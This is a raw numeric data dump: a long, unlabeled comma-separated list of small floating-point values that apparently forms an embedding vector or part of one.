-0.027867326512932777, -0.012999314814805984, 0.0027566999197006226, 0.007092894520610571, 0.02240954339504242, 0.004701406229287386, 0.0014562123687937856, 0.0004131805617362261, 0.008342401124536991, -0.013014145195484161, 0.01025559101253748, 0.004994317423552275, -0.004890500567853451, 0.002964333165436983, -0.0007137387292459607, 0.017070405185222626, -0.002363680163398385, -0.032657720148563385, 0.0056246318854391575, 0.002411880763247609, 0.048645466566085815, 0.015157215297222137, -0.015527988784015179, 0.001864990103058517, 0.005620924290269613, -0.009462136775255203, -0.001863136189058423, -0.0027882156427949667, -0.03449675440788269, -0.013985571451485157, 0.013258855789899826, -0.010144359432160854, -0.028089791536331177, -0.00480522308498621, -0.006770321633666754, -0.005513399839401245, 0.02758553810417652, -0.009699431248009205, -0.00367065635509789, 0.002958771539852023, -0.0033870148472487926, 0.01926538348197937, 0.004983194172382355, -0.008431386202573776, -0.0025212590117007494, -0.006399548612535, -0.026013460010290146, 0.010974891483783722, -0.012509893625974655, 0.02068915404379368, -0.020407365635037422, -0.022246401757001877, -0.020437028259038925, 0.0028697859961539507, 0.004441864788532257, 0.010144359432160854, 0.014059726148843765, 0.020733647048473358, -0.017737798392772675, -0.008905976079404354, 0.02439688704907894, -0.0007647200836800039, -0.0041526616550982, -0.02350703254342079, -0.007615684997290373, -0.0213417150080204, 0.012999314814805984, -0.013436826877295971, -0.00020438882347662002, 0.023922298103570938, 0.005995405372232199, 0.012280014343559742, 0.03289501368999481, -0.016417844220995903, 0.012888082303106785, 0.013822431676089764, 0.0032757828012108803, -0.006225285120308399, -0.011568129062652588, -0.014252528548240662, 0.01846451312303543, -0.007749163545668125, 0.011034215800464153, 0.015646636486053467, 0.014712287113070488, 0.03090766817331314, -0.007912303321063519, -0.017426349222660065, -0.008579695597290993, -0.012235521338880062, 0.0028512473218142986, -0.007941965945065022, -0.002319187391549349, -0.010707935318350792, 0.015216539613902569, -0.01948784850537777, 0.02138620801270008, -0.030878005549311638, -0.01926538348197937, -0.03197549656033516, 0.010544794611632824, 0.001598960137926042, -0.024278240278363228, -0.015379679389297962, 0.0025620439555495977, 0.001041873125359416, -0.016996251419186592, 0.012450570240616798, -0.005665417294949293, -0.0029606253374367952, 0.023358723148703575, 0.002621367806568742, -0.017989924177527428, 0.0000665074767312035, 0.014007817953824997, 0.023996451869606972, -0.0069223386235535145, -0.02989916503429413, 0.02728891931474209, 0.013162454590201378, -0.018983596935868263, -0.0016471607377752662, 0.008854067884385586, -0.043958891183137894, -0.000797626213170588, -0.012168781831860542, 0.005676540546119213, -0.036068834364414215, 0.013221777975559235, -0.010018296539783478, 0.004734775982797146, 0.006373594049364328, -0.0002027666923822835, -0.01069310400635004, -0.010848828591406345, 0.026858823373913765, 0.01279909722507, 0.0005839680670760572, -0.009580783545970917, 0.009343489073216915, 0.011857332661747932, 0.004026598762720823, 0.01149397436529398, -0.009150686673820019, 0.010196267627179623, -0.008461047895252705, -0.010040543042123318, 0.037225645035505295, 0.002465642988681793, 0.04241647198796272, -0.02058533765375614, 0.0287423525005579, 0.004211985506117344, 0.004757022485136986, -0.021890459582209587, -0.023685002699494362, 0.010114697739481926, 0.010841413401067257, 0.003933905623853207, 0.0022413250990211964, -0.01191665604710579, -0.007771410048007965, -0.029246604070067406, -0.0037522264756262302, 0.011746100150048733, 0.005658001638948917, -0.0041118767112493515, -0.01801958680152893, 0.03015129081904888, -0.018093740567564964, 0.026740174740552902, -0.012131704948842525, -0.010529963299632072, -0.0027307458221912384, 0.004690282978117466, 0.00018063615425489843, 0.0004203643184155226, 0.007815903052687645, -0.010989722795784473, 0.01536484807729721, -0.011568129062652588, -0.0238184817135334, -0.0036391406320035458, 0.005153750069439411, -0.00875025149434805, -0.014037479646503925, 0.015016322024166584, -0.01262112520635128, -0.03126361221075058, 0.014741948805749416, -0.014652963727712631, -0.012717526406049728, 0.019339539110660553, -0.003390722442418337, -0.0012532139662653208, 0.01846451312303543, 0.009795832447707653, -0.0006289243465289474, -0.010455809533596039, 0.0062994398176670074, -0.027110949158668518, 0.01824204996228218, -0.0075637768022716045, 0.004223108757287264, 0.0107820900157094, -0.007478498853743076, -0.025613024830818176, -0.007100310176610947, -0.03476371243596077, 0.0033258371986448765, -0.012116873636841774, -0.0044084955006837845, -0.02036287449300289, 0.004734775982797146, -0.005810018628835678, 0.013777938671410084, -0.000804578245151788, 0.00317752780392766, -0.00012814854562748224, 0.02033321186900139, 0.008824406191706657, 0.000804578245151788, 0.008542618714272976, 0.01810857094824314, 0.027066456153988838, 0.007986458018422127, 0.012739772908389568, -0.01723354682326317, 0.005187119357287884, 0.0019298753468319774, 0.0006970539106987417, -0.020437028259038925, 0.021682826802134514, -0.004953532479703426, -0.0006599766202270985, 0.010107282549142838, 0.021579010412096977, 0.01692209579050541, -0.004063676111400127, -0.01111578568816185, -0.0023062103427946568, -0.0011345664970576763, 0.010440978221595287, 0.025301575660705566, -0.0181975569576025, -0.00318865105509758, 0.008498125709593296, 0.008119937032461166, 0.014044895768165588, 0.0016202796250581741, 0.00035292989923618734, -0.010774673894047737, 0.0157207902520895, -0.006369886454194784, 0.014971829019486904, -0.009958973154425621, 0.01062636449933052, -0.012139120139181614, -0.018523838371038437, -0.000261858687736094, 0.0027548461221158504, -0.004860838875174522, -0.012183613143861294, -0.03692902624607086, 0.009239672683179379, -0.013303348794579506, 0.0074822064489126205, -0.0035334702115505934, 0.0010789504740387201, 0.010722765699028969, -0.0126878647133708, 0.0005028613959439099, -0.023091765120625496, 0.023922298103570938, 0.008661266416311264, 0.007285696920007467, 0.0002240861504105851, 0.007660178001970053, -0.0037874500267207623, -0.0006187280523590744, -0.007697255350649357, -0.006547857541590929, -0.0051611652597785, 0.008839237503707409, 0.002150485524907708, -0.004812638275325298, -0.0019224599236622453, -0.020451858639717102, 0.0041934470646083355, -0.002940232865512371, -0.020006930455565453, 0.002917986363172531, -0.0126878647133708, 0.0009918187279254198, 0.005832265131175518, -0.006874138489365578, -0.003457461716607213, -0.0006859307177364826, -0.0029865794349461794, 0.004779268987476826, -0.0009459355496801436, 0.010492886416614056, 0.00530205899849534, -0.009402812458574772, 0.010774673894047737, 0.008646435104310513, -0.00318865105509758, 0.0030681495554745197, -0.0003003264428116381, 0.0006094587151892483, 0.004019183572381735, -0.008794744499027729, 0.010211098939180374, -0.006614597048610449, -0.012836174108088017, -0.006247531156986952, -0.012005642056465149, 0.021667996421456337, -0.008624188601970673, 0.003930197563022375, 0.008601942099630833, -0.03532728552818298, -0.006336516700685024, 0.0006701728561893106, -0.0046012974344193935, -0.001881674863398075, -0.0038337965961545706, -0.014096803963184357, 0.004260186105966568, -0.009684600867331028, -0.007337605115026236, -0.017114898189902306, -0.022691329941153526, -0.011990810744464397, -0.010174021124839783, -0.0035297623835504055, -0.005264981649816036, 0.0019168982980772853, 0.02533123642206192, 0.007704670540988445, 0.016536492854356766, -0.0014117195969447494, -0.009766170755028725, -0.00872800499200821, 0.005569016095250845, 0.027511384338140488, -0.009721677750349045, -0.018939103931188583, -0.009892233647406101, -0.005665417294949293, 0.007448837161064148, -0.008290492929518223, -0.00694087753072381, 0.0012763873673975468, 0.018212387338280678, 0.0017519041430205107, -0.0011540320701897144, -0.008883729577064514, -0.0052538588643074036, 0.018301373347640038, 0.013318179175257683, 0.013266270980238914, 0.014311851933598518, 0.009951557032763958, -0.0012800950789824128, -0.00007172147161327302, -0.007040986325591803, 0.01461588591337204, 0.001310683903284371, 0.004645790439099073, 0.027793172746896744, 0.015646636486053467, 0.016595816239714622, -0.001343126525171101, 0.021045096218585968, 0.013318179175257683, -0.008846652694046497, -0.0181975569576025, -0.02129722200334072, -0.004953532479703426, -0.012428323738276958, 0.011367911472916603, 0.0020559383556246758, -0.022750653326511383, 0.0106708575040102, 0.02515326626598835, -0.009180348366498947, -0.008876314386725426, 0.020348042249679565, -0.008898560889065266, 0.02728891931474209, -0.0009945995407178998, 0.024945631623268127, -0.005294643808156252, -0.018093740567564964, 0.016284367069602013, -0.010025711730122566, -0.0008838310022838414, 0.00478297658264637, 0.005175996106117964, -0.005090718623250723, -0.017989924177527428, 0.010374238714575768, 0.010485471226274967, 0.019117075949907303, -0.010537379421293736, 0.0222315713763237, 0.004119292367249727, 0.004364002496004105, -0.021623503416776657, -0.0052167815156280994, -0.002682545455172658, 0.0035483010578900576, 0.0036057711113244295, -0.0019076289609074593, -0.016284367069602013, 0.0002197990834247321, -0.009580783545970917, 0.0042082779109478, -0.016195381060242653, 0.00036498004919849336, 0.016002578660845757, -0.006080683320760727, 0.000097559743153397, -0.030344093218445778, -0.004056260455399752, -0.0069927857257425785, 0.001607302576303482, -0.007890057750046253, 0.0007712086080573499, -0.0073005277663469315, 0.019117075949907303, -0.02015523985028267, -0.002600975101813674, -0.022780315950512886, -0.013028976507484913, 0.011345664970576763, 0.0019039212493225932, -0.00949921365827322, 0.010077619925141335, -0.008802159689366817, -0.01030008401721716, -0.0077195013873279095, -0.008127352222800255, -0.0009334219503216445, 0.0005807238048873842, -0.005924958270043135, 0.01468262542039156, -0.003742957254871726, 0.014133880846202374, -0.007771410048007965, 0.015691129490733147, -0.008624188601970673, 0.0073487283661961555, 0.02031838148832321, -0.01665513962507248, -0.003878289368003607, 0.007033570669591427, 0.01162745337933302, -0.019028089940547943, 0.01151622086763382, 0.007890057750046253, -0.025227420032024384, 0.002350703114643693, -0.008105105720460415, 0.007912303321063519, -0.005895296577364206, 0.006095514167100191, 0.012383830733597279, 0.01643267646431923, 0.0044678193517029285, 0.03339926525950432, -0.014059726148843765, -0.00002298505205544643, 0.01554282009601593, -0.012057550251483917, -0.01603224128484726, 0.0015628098044544458, -0.01266561821103096, 0.035712890326976776, 0.0014793857699260116, -0.00799387414008379, -0.002094869501888752, -0.0015025590546429157, -0.0025138433557003736, 0.0025842904578894377, 0.0028104621451348066, -0.024545196443796158, 0.004834884777665138, -0.004156369715929031, 0.0032053356990218163, 0.0036799258086830378, 0.01718905381858349, 0.009046870283782482, 0.010403900407254696, -0.003463023342192173, 0.009150686673820019, -0.006781444884836674, 0.02006625570356846, 0.0147048719227314, 0.0019836374558508396, -0.001107685500755906, -0.013162454590201378, 0.005198242608457804, 0.018850117921829224, 0.009714262560009956, -0.025761334225535393, -0.03209414333105087, -0.010529963299632072, 0.010515132918953896, -0.010567041113972664, 0.02055567502975464, -0.0005552330985665321, 0.008201506920158863, 0.01423769723623991, 0.03873840346932411, -0.0222315713763237, -0.004378833342343569, 0.013229194097220898, -0.0025972675066441298, -0.011419819667935371, -0.005958328023552895, 0.004723652731627226, 0.038857050240039825, -0.0015192439313977957, 0.008824406191706657, 0.007263450417667627, 0.033903516829013824, -0.013192116282880306, 0.02006625570356846, 0.01784161478281021, 0.00696312403306365, -0.0014191351365298033, 0.014964412897825241, -0.015305524691939354, 0.0006089952657930553, 0.01979929767549038, -0.00733018945902586, -0.0016360374866053462, -0.007241203915327787, -0.004701406229287386, 0.01687760464847088, 0.01868697814643383, 0.009202594868838787, 0.0157207902520895, 0.01696658879518509, 0.015157215297222137, -0.014623302035033703, -0.017322532832622528, 0.029469067230820656, -0.0008875387720763683, -0.029572883620858192, -0.00002591068550827913, 0.0034982466604560614, -0.015023737214505672, -0.01187216304242611, -0.008913392201066017, 0.01775262877345085, -0.007941965945065022, -0.005761818028986454, 0.006403256207704544, 0.02740756794810295, 0.005795187782496214, -0.0036317252088338137, -0.027644863352179527, -0.00008162807353073731, 0.006729536689817905, 0.006125176325440407, -0.01348131988197565, -0.0014033771585673094, 0.012443154118955135, 0.013518396764993668, -0.007660178001970053, -0.01306605339050293, 0.009951557032763958, -0.008461047895252705, 0.006273485254496336, -0.006180792115628719, 0.021237898617982864, -0.021445531398057938, -0.009387982077896595, 0.02031838148832321, -0.002105992753058672, 0.012280014343559742, -0.01075984351336956, -0.0072782812640070915, -0.001037238514982164, 0.010989722795784473, -0.005405875854194164, 0.014571393840014935, 0.006966831628233194, -0.0038152579218149185, -0.01766364276409149, 0.02510877326130867, -0.00002989360291394405, -0.014734533615410328, -0.006814814638346434, -0.011634868569672108, 0.0014673356199637055, 0.025894811376929283, 0.0077788252383470535, 0.008045782335102558, 0.005973158869892359, -0.00036104058381170034, 0.0029791640117764473, 0.0009955265559256077, -0.005698786582797766, -0.029424574226140976, -0.004256478510797024, 0.0029661869630217552, 0.00994414184242487, 0.02174215018749237, -0.005847095977514982, -0.006770321633666754, -0.008816991001367569, -0.001578567666001618, -0.006076975725591183, -0.022305725142359734, -0.009380565956234932, 0.004753314424306154, 0.007434006314724684, 0.030180951580405235, -0.01304380688816309, -0.000809676363132894, 0.002895740093663335, 0.0016851649852469563, 0.00918776448816061, 0.010982307605445385, 0.02343287691473961, -0.03431878238916397, 0.01948784850537777, -0.019013257697224617, 0.02232055738568306, 0.009832910262048244, 0.005290936212986708, -0.006877846084535122, -0.0024192961864173412, -0.010922983288764954, -0.005617216695100069, -0.0005872123292647302, -0.0244858730584383, -0.008090275339782238, 0.01718905381858349, 0.020570507273077965, 0.008831821382045746, 0.004734775982797146, -0.0206743236631155, 0.011753516271710396, -0.0019632449839264154, 0.008119937032461166, 0.011256679892539978, 0.020348042249679565, -0.0075155762024223804, 0.019502678886055946, 0.010537379421293736, -0.015350017696619034, 0.01824204996228218, -0.016180550679564476, 0.03024027682840824, 0.012895497493445873, 0.007419175002723932, 0.014526900835335255, 0.003974690567702055, 0.0048867929726839066, -0.009914480149745941, -0.005754402838647366, -0.00027970215887762606, -0.0043380483984947205, -0.004490065388381481, -0.01806407794356346, 0.010863659903407097, 0.013666706159710884, 0.0126878647133708, -0.005847095977514982, 0.006525611504912376, -0.016640309244394302, -0.00018225828534923494, -0.04529367387294769, 0.01775262877345085, 0.0035204931627959013, -0.01652166061103344, -0.001868697814643383, 0.014912504702806473, -0.012153951451182365, 0.01027783751487732, 0.016047071665525436, 0.005576431285589933, -0.0033017368987202644, 0.012806512415409088, -0.02051118202507496, -0.020792970433831215, 0.01315503939986229, -0.006169668864458799, -0.010107282549142838, -0.008535202592611313, 0.009840325452387333, 0.0017889814916998148, 0.02976568602025509, -0.014474992640316486, 0.004085922613739967, -0.026161769405007362, 0.014964412897825241, 0.028505057096481323, 0.010144359432160854, -0.010589287616312504, 0.0013996694469824433, -0.0007647200836800039, -0.01779712177813053, 0.013518396764993668, -0.005120380315929651, -0.006047313567250967, 0.029691532254219055, -0.01279909722507, 0.010129528120160103, -0.002641760278493166, 0.010997137986123562, -0.011227017268538475, 0.023106597363948822, -0.0020132993813604116, 0.011731269769370556, -0.031827185302972794, -0.02404094487428665, -0.020095916464924812, -0.01741151697933674, 0.002345141489058733, -0.008779913187026978, 0.007230080664157867, -0.0019502679351717234, -0.007059524767100811, -0.014460161328315735, -0.033369604498147964, 0.026769837364554405, 0.02325490675866604, 0.018894610926508904, 0.001325514749623835, -0.009061701595783234, 0.014956997707486153, 0.01184991654008627, -0.002587998053058982, 0.01540934108197689, 0.002369241788983345, -0.026562204584479332, -0.0073598516173660755, 0.009254503063857555, -0.010003465227782726, -0.006477410905063152, 0.014289605431258678, 0.0016619915841147304, -0.006403256207704544, 0.013125377707183361, 0.0002861906832549721, -0.011694191955029964, 0.02700713276863098, 0.00044237897964194417, 0.004775560926645994, 0.0008560230489820242, 0.0069816624745726585, 0.014111634343862534, -0.0007874299772083759, -0.0002291842974955216, 0.007630515843629837, 0.0006303147529251873, -0.014764195308089256, -0.02307693473994732, 0.001315318513661623, -0.010722765699028969, -0.017559826374053955, 0.0041007534600794315, 0.015527988784015179, 0.011657115072011948, -0.003403699491173029, 0.008572280406951904, -0.006955708377063274, 0.008861484006047249, 0.010403900407254696, -0.001603594864718616, 0.0017963970312848687, -0.004427033942192793, -0.004438157193362713, 0.0022876716684550047, -0.007437713909894228, 0.005250150803476572, -0.01003312785178423, -0.0006562688504345715, 0.0007605488644912839, -0.01607673428952694, -0.025538869202136993, -0.005732156336307526, 0.002348849317058921, 0.0019335831748321652, 0.007511868607252836, -0.017945431172847748, -0.016417844220995903, 0.016150888055562973, 0.010144359432160854, -0.005235319957137108, 0.001299560652114451, -0.001083585200831294, 0.005157457664608955, -0.021134082227945328, -0.00011250654642935842, -0.012524724937975407, 0.026413895189762115, -0.00044515979243442416, 0.004178615752607584, -0.02103026583790779, -0.011642283760011196, 0.007808487396687269, 0.020807800814509392, 0.003099665278568864, -0.0005658928421325982, -0.010848828591406345, -0.007337605115026236, 0.0015340747777372599, -0.01308829989284277, -0.014927336014807224, -0.013377503491938114, 0.01423769723623991, -0.002391488291323185, -0.014556562528014183, -0.0014487969456240535, 0.04232748970389366, -0.005902712233364582, 0.0014682625187560916, 0.008616773411631584, 0.012391245923936367, 0.006384717300534248, 0.009343489073216915, 0.012413492426276207, -0.0014673356199637055, 0.011152862571179867, 0.00961044616997242, -0.0003784205764532089, -0.006989078130573034, -0.032746702432632446, 0.003197920275852084, 0.006937169935554266, -0.007007616572082043, -0.003668802557513118, -0.014059726148843765, -0.0052056582644581795, 0.01718905381858349, -0.005850804038345814, 0.0030310722067952156, 0.007956796325743198, -0.02568717859685421, -0.0033554991241544485, -0.016091564670205116, -0.011620037257671356, 0.012168781831860542, -0.008194091729819775, -0.008008704520761967, -0.0032609517220407724, -0.02028871886432171, -0.01030008401721716, 0.015572481788694859, 0.0006006528856232762, -0.03325095772743225, -0.002849393291398883, -0.012828758917748928, -0.025894811376929283, 0.0301067978143692, 0.014111634343862534, 0.022602343931794167, -0.0016573569737374783, -0.020051423460245132, 0.0022839640732854605, 0.017278039827942848, -0.020911619067192078, 0.019695481285452843, -0.026903316378593445, -0.013436826877295971, 0.034526415169239044, 0.0032405592501163483, 0.012524724937975407, -0.006251239217817783, -0.0004196691152174026, -0.011901825666427612, 0.025316406041383743, 0.0041712005622684956, -0.007589730899780989, 0.027036793529987335, -0.0031144963577389717, 0.01151622086763382, 0.0028827630449086428, -0.006340224761515856, -0.010567041113972664, 0.0184200219810009, 0.030522063374519348, -0.022201908752322197, 0.0035334702115505934, 0.005005440674722195, -0.011924071237444878, 0.02120823599398136, -0.002089307876303792, 0.01701108179986477, -0.011790593154728413, 0.013822431676089764, -0.0017871276941150427, 0.000528352044057101, -0.000797162763774395, -0.010218514129519463, -0.007430298253893852, 0.007704670540988445, 0.004293555859476328, -0.0014191351365298033, 0.013644459657371044, -0.002172732027247548, -0.000014425401786866132, -0.01147172786295414, -0.0015665175160393119, -0.00048015150241553783, 0.03915366902947426, -0.0011039776727557182, 0.0004208277678117156, -0.0022413250990211964, 0.004927577916532755, -0.007445129100233316, 0.003197920275852084, 0.00266771437600255, -0.004953532479703426, 0.01030008401721716, -0.006021359469741583, -0.004312094300985336, 0.00413041515275836, 0.0011327126994729042, -0.027926649898290634, -0.003704025875777006, 0.01567629724740982, -0.022661669179797173, 0.008090275339782238, 0.013822431676089764, 0.006644258741289377, -0.0008541691349819303, -0.023892635479569435, -0.0061844997107982635, -0.006655381992459297, 0.02542022243142128, -0.011264095082879066, -0.009358319453895092, 0.008535202592611313, -0.001857574563473463, -0.0059101274237036705, -0.023610848933458328, 0.009647523052990437, 0.00878732930868864, 0.004367710091173649, 0.008854067884385586, -0.006966831628233194, 0.007956796325743198, 0.009373150765895844, -0.00480522308498621, 0.0024878892581909895, -0.016225041821599007, 0.0034240921959280968, 0.0032887598499655724, 0.012161366641521454, 0.010233345441520214, 0.014356344938278198, -0.013570304960012436, -0.00598799018189311, -0.016225041821599007, -0.002975456416606903, -0.016684802249073982, -0.01344424206763506, -0.02461935207247734, 0.01235416904091835, 0.011553298681974411, 0.011241848580539227, -0.0024860354606062174, 0.00839430931955576, 0.011709023267030716, 0.0001222393475472927, -0.01060411799699068, -0.028890661895275116, -0.011716438457369804, -0.008839237503707409, -0.0064699952490627766, 0.0015053398674353957, -0.001826058840379119, -0.006065852474421263, -0.01474936492741108, -0.016136057674884796, -0.009373150765895844, 0.0269329771399498, 0.027244428172707558, -0.0039005358703434467, 0.017604319378733635, 0.028045298531651497, 0.0046828677877783775, 0.018301373347640038, 0.00417490815743804, -0.015972916036844254, -0.0015173900173977017, 0.021771812811493874, -0.0046828677877783775, 0.008023535832762718, 0.00258058262988925, 0.003099665278568864, 0.0025008663069456816, 0.005531938746571541, 0.005524523090571165, -0.002391488291323185, 0.006036190316081047, -0.0008796598413027823, -0.005383629351854324, 0.006251239217817783, 0.005750694777816534, -0.012235521338880062, 0.01837552897632122, 0.011827670969069004, 0.018256880342960358, -0.02608761377632618, -0.0008184821926988661, -0.003425945993512869, 0.01545383408665657, 0.0003471365780569613, -0.0046346671879291534, 0.004571635741740465, -0.005854511633515358, 0.010552209801971912, 0.010730181820690632, -0.01549832709133625, -0.015468665398657322, 0.0014423084212467074, -0.015839438885450363, -0.023373553529381752, -0.01277685072273016, 0.02042219787836075, 0.02648804895579815, 0.027466891333460808, 0.002879055216908455, -0.015468665398657322, 0.0037874500267207623, -0.0039042436983436346, -0.01233192253857851, -0.01899842731654644, 0.018360696732997894, 0.014652963727712631, 0.00256945937871933, 0.0006581227062270045, -0.023284567520022392, -0.01705557480454445, 0.029558053240180016, 0.0002595413534436375, -0.005383629351854324, -0.004986901767551899, -0.0038819971960037947, 0.013028976507484913, -0.01948784850537777, 0.010122112929821014, 0.023551523685455322, -0.0022728408221155405, 0.008334985002875328, -0.01151622086763382, -0.019828960299491882, 0.012205859646201134, 0.02665119059383869, -0.04591657593846321, 0.02089678682386875, -0.00690750777721405, 0.005372506100684404, -0.03280602768063545, 0.008446217514574528, -0.005772941280156374, -0.03081868216395378, 0.00945472065359354, -0.02374432608485222, -0.013889170251786709, 0.02958771586418152, 0.001890017301775515, -0.021356545388698578, -0.003982106223702431, 0.01351098157465458, 0.010389070026576519, -0.006774029694497585, 0.0018733324250206351, 0.007485914509743452, -0.012176197953522205, -0.035623904317617416, 0.008238584734499454, -0.003948736470192671, 0.011775761842727661, -0.01775262877345085, -0.018034417182207108, 0.0012216982431709766, 0.019369201734662056, -0.0006715632625855505, 0.015305524691939354, -0.039835892617702484, -0.020615000277757645, 0.007007616572082043, -0.009714262560009956, 0.018657315522432327, -0.0038708739448338747, 0.0294097438454628, -0.018390359356999397, 0.0024749122094362974, 0.0010483617661520839, -0.004008060321211815, 0.037225645035505295, -0.009291580878198147, -0.005242735613137484, 0.007497037760913372, 0.01060411799699068, 0.02095611020922661, 0.036691732704639435, -0.011152862571179867, 0.0072078341618180275, -0.0011178817367181182, 0.0035761091858148575, 0.006232700310647488, 0.010085036046802998, -0.0073524359613657, -0.010351992212235928, 0.013377503491938114, 0.004230523947626352, 0.007296820171177387, -0.012191028334200382, 0.01598774828016758, 0.0025601901579648256, -0.010678272694349289, 0.022305725142359734, -0.0072782812640070915, -0.006703582592308521, -0.006977954879403114, 0.03681037947535515, 0.0072782812640070915, 0.024915970861911774, 0.019057750701904297, -0.016536492854356766, 0.002330310642719269, 0.005832265131175518, 0.010871075093746185, 0.010263007134199142, -0.0053910450078547, 0.016551323235034943, -0.025435052812099457, 0.009395397268235683, -0.0027511385269463062, -0.0044678193517029285, -0.00024169789685402066, -0.009254503063857555, -0.018123403191566467, -0.008164430037140846, -0.018360696732997894, -0.012991898693144321, 0.005290936212986708, 0.0022858178708702326, 0.007675008848309517, -0.015335186384618282, 0.02147519402205944, -0.0035983556881546974, 0.002934671239927411, -0.008127352222800255, -0.011145447380840778, 0.009380565956234932, 0.0042082779109478, -0.01674412563443184, 0.00217458582483232, -0.0197548046708107, 0.009410228580236435, -0.0222315713763237, 0.0005987989716231823, 0.028994478285312653, -0.001854793750680983, -0.006914923433214426, -0.0077788252383470535, 0.004434449598193169, 0.01069310400635004, -0.008794744499027729, 0.006647966336458921, 0.007459960412234068, 0.024812154471874237, 0.009336073882877827, -0.024189254269003868, -0.00736355921253562, 0.0038745817728340626, -0.0014756780583411455, 0.009892233647406101, -0.010203682817518711, 0.009106193669140339, 0.0237888190895319, -0.024915970861911774, -0.0028475394938141108, 0.008268246427178383, -0.004534558393061161, -0.02369983308017254, -0.029795348644256592, -0.004630959592759609, 0.017871277406811714, -0.0215641800314188, -0.004842300433665514, -0.01824204996228218, -0.012680449523031712, 0.008913392201066017, 0.04318768158555031, 0.002415588591247797, -0.007934549823403358, 0.0002931426861323416, 0.007749163545668125, 0.005016563925892115, 0.0083053233101964, -0.003361060516908765, 0.011249263770878315, -0.009261919185519218, -0.014208035543560982, 0.00698537053540349, -0.0027882156427949667, 0.012606294825673103, 0.02060016803443432, 0.0006340224645100534, -0.017989924177527428, -0.0032980290707200766, 0.005428122356534004, 0.007497037760913372, 0.0006687824497930706, -0.0022765484172850847, 0.005676540546119213, 0.023284567520022392, 0.0007174464990384877, 0.012747188098728657, -0.007830733433365822, 0.0008829041034914553, -0.0008713174029253423, 0.0037781805731356144, -0.017722968012094498, -0.003878289368003607, 0.016625478863716125, -0.0262655857950449, -0.00013799720909446478, -0.01352581288665533, -0.004275016952306032, -0.00696312403306365, -0.016462337225675583, 0.006607181392610073, 0.0032887598499655724, -0.014734533615410328, -0.0011762785725295544, 0.006673920899629593, 0.026473218575119972, 0.006670212838798761, 0.0025119895581156015, 0.0077195013873279095, -0.013896586373448372, 0.007979042828083038, 0.0030125335324555635, 0.014942167326807976, -0.005721033085137606, 0.0035946478601545095, 0.001072461949661374, 0.01536484807729721, -0.0017862006789073348, -0.005672832485288382, -0.012005642056465149, -0.0002623221662361175, -0.0012763873673975468, -0.003203481901437044, -0.010544794611632824, 0.014801273122429848, 0.01030008401721716, 0.008149598725140095, -0.004160077311098576, -0.006425502710044384, 0.007637931499630213, -0.00041804698412306607, 0.025049449875950813, 0.008386894129216671, 0.019384032115340233, 0.006892676930874586, -0.007463668007403612, 0.004412203095853329, -0.004890500567853451, -0.0007860395708121359, -0.021178575232625008, -0.010018296539783478, -0.01899842731654644, 0.005669124890118837, 0.017589488998055458, 0.013310763984918594, 0.004983194172382355, 0.0017658082069829106, -0.022261234000325203, 0.006162253208458424, -0.008980130776762962, 0.006525611504912376, 0.010389070026576519, -0.004449280444532633, 0.0010882198112085462, 0.007018739823251963, -0.006273485254496336, 0.004775560926645994, -0.0018761132378131151, 0.012465400621294975, 0.006525611504912376, 0.00006355287041515112, -0.0181975569576025, 0.010663442313671112, 0.011397573165595531, -0.007037278730422258, 0.02200910821557045, 0.019547171890735626, -0.017589488998055458, 0.006102929823100567, 0.022216740995645523, 0.0045530968345701694, -0.00874283630400896, -0.015468665398657322, 0.017589488998055458, -0.0054689073003828526, 0.011938902549445629, -0.00952146016061306, 0.005424414295703173, -0.033636558800935745, -0.0072078341618180275, -0.02068915404379368, 0.004211985506117344, 0.01692209579050541, -0.007845564745366573, 0.004972070921212435, 0.013844677247107029, 0.03138225898146629, 0.00479409983381629, -0.025390559807419777, 0.0016601377865299582, 0.003505662316456437, 0.0015303670661523938, -0.003952444065362215, -0.015045983716845512, -0.008068028837442398, -0.008505540899932384, 0.006888969335705042, 0.0004032160504721105, 0.0006785152945667505, 0.009350904263556004, -0.005999112967401743, 0.011768346652388573, 0.025835487991571426, 0.001316245412454009, 0.031055977568030357, 0.03250940889120102, 0.017426349222660065, -0.002895740093663335, -0.00794938113540411, 0.0035557167138904333, -0.007956796325743198, 0.0007434005965478718, 0.023892635479569435, -0.0046235439367592335, 0.05146334320306778, 0.020214565098285675, 0.004831177182495594, -0.004145246464759111, 0.01319953240454197, 0.0020411075092852116, -0.0022227864246815443, 0.0011512513738125563, 0.005698786582797766, 0.01466037891805172, 0.01859799213707447, -0.00014518095122184604, -0.01922089233994484, 0.009365735575556755, 0.008097690530121326, 0.007422883063554764, 0.0067072901874780655, 0.0016601377865299582, -0.017856445163488388, 0.012235521338880062, 0.02019973285496235, 0.014482407830655575, 0.03271704167127609, -0.019695481285452843, 0.00257502100430429, -0.010819166898727417, -0.013288517482578754, 0.045590292662382126, -0.0013931809226050973, 0.01388175506144762, -0.010618949308991432, 0.010656027123332024, -0.04152661934494972, -0.023610848933458328, 0.028935153037309647, 0.007771410048007965, 0.005331721156835556, 0.001559101976454258, -0.013755692169070244, -0.000786503020208329, -0.005246443208307028, -0.003238705452531576, -0.011649698950350285, -0.006996493320912123, -0.008935638703405857, -0.017040744423866272, 0.01262112520635128, -0.00001758276812324766, -0.015275862999260426, 0.012294844724237919, -0.005650585982948542, 0.003652117680758238, 0.01313279289752245, -0.002977310214191675, -0.02461935207247734, -0.006977954879403114, 0.011404989287257195, 0.020451858639717102, 0.016996251419186592, 0.006028775125741959, -0.00794938113540411, -0.03485269844532013, 0.010418731719255447, -0.03755192831158638, -0.029869502410292625, 0.025702010840177536, 0.01788610778748989, -0.02444138005375862, 0.010062789544463158, 0.011686776764690876, 0.0004555877821985632, -0.00044446458923630416, 0.00003635316897998564, -0.0012235521571710706, 0.0011818400816991925, -0.028860999271273613, -0.0046235439367592335, 0.0014951436314731836, 0.013829846866428852, -0.009061701595783234, 0.004063676111400127, -0.015394510701298714, 0.0032572441268712282, -0.020911619067192078, 0.007941965945065022, 0.005461491644382477, -0.01776745915412903, 0.0027641155757009983, 0.007078063674271107, 0.0007475718157365918, 0.019769636914134026, 0.01629919745028019, -0.019295046105980873, 0.00869834329932928, -0.010099866427481174, -0.0147048719227314, 0.018167894333600998, 0.0030440494883805513, -0.003448192263022065, -0.006114053074270487, -0.0017760044429451227, -0.00794938113540411, 0.01510530710220337, 0.007304235361516476, -0.01428219024091959, 0.014445330947637558, 0.0005788699490949512, -0.004241647198796272, -0.026858823373913765, 0.006073267664760351, 0.00318308942951262, 0.013266270980238914, -0.004082215018570423, -0.0005584774189628661, 0.009380565956234932, -0.018746301531791687, -0.008601942099630833, -0.02174215018749237, -0.013770523481070995, -0.028727520257234573, 0.0114494813606143, 0.027140609920024872, 